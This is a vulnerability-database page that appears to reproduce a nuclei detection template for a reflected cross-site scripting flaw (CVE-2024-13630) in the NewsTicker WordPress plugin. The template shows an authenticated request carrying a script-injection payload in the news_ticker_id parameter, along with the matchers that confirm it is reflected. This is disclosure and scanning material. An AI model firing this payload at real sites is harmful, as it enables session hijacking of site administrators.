Lucene search
K

NewsTicker <= 1.0 - Reflected Cross-Site Scripting

🗓️ 10 Jul 2026 03:01:38Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 15 Views

NewsTicker plugin v1.0 has reflected XSS due to insufficient sanitization; requires malicious link.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-13630
26 Feb 202506:25
circl
CNNVD
WordPress plugin NewsTicker 跨站脚本漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-13630
26 Feb 202506:00
cve
Cvelist
CVE-2024-13630 News List <= 1.0 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2024-53913
3 Oct 202520:07
euvd
NVD
CVE-2024-13630
26 Feb 202513:15
nvd
OSV
CVE-2024-13630
26 Feb 202513:15
osv
Patchstack
WordPress News List plugin <= 1.0 - Reflected XSS vulnerability
26 Feb 202522:12
patchstack
Positive Technologies
PT-2025-8677
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-13630
28 Feb 202506:25
redhatcve
Rows per page
id: CVE-2024-13630

info:
  name: NewsTicker <= 1.0 - Reflected Cross-Site Scripting
  author: Sourabh-Sahu
  severity: medium
  description: |
    NewsTicker WordPress plugin v1.0 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before outputting it in the page, letting attackers execute arbitrary scripts in the context of high privilege users, exploit requires attacker to craft a malicious link.
  impact: |
    Attackers can execute arbitrary scripts in the context of high privilege users, potentially leading to session hijacking or privilege escalation.
  remediation: |
    Update to the latest version of the plugin where the issue is fixed or implement proper sanitization and escaping measures.
  reference:
    - https://wpscan.com/vulnerability/15eed487-01ac-4c1e-88f8-26cfa036fb54/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-13630
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2024-13630
    cwe-id: CWE-79
    epss-score: 0.0059
    epss-percentile: 0.44057
    cpe: cpe:2.3:a:mahinsha:newsticker:1.0:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: mahinsha
    product: newsticker
    shodan-query: http.component:"WordPress"
    fofa-query: body="news-ticker"
  tags: cve,cve2024,wordpress,wpscan,wp,wp-plugin,newsticker,xss,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - status_code == 302
          - contains(header, 'wordpress_logged_in')
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/admin.php?page=update_news&news_ticker_id=1"></script><script>alert(document.domain)</script><script> HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - contains_all(body, "></script><script>alert(document.domain)</script><script>")
        condition: and
# digest: 4a0a00473045022100ef5d00cd9c5c98ae4e164042b9a4056dbec1292a0b0514c8a229061735092da702203f51a7f5c62823810acb2086f3de3be8a2a95257d5f315a5731e0605d4ceb0d9:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Feb 2026 03:40Current
7.2High risk
Vulners AI Score7.2
CVSS 3.16.1
EPSS0.0059
SSVC
15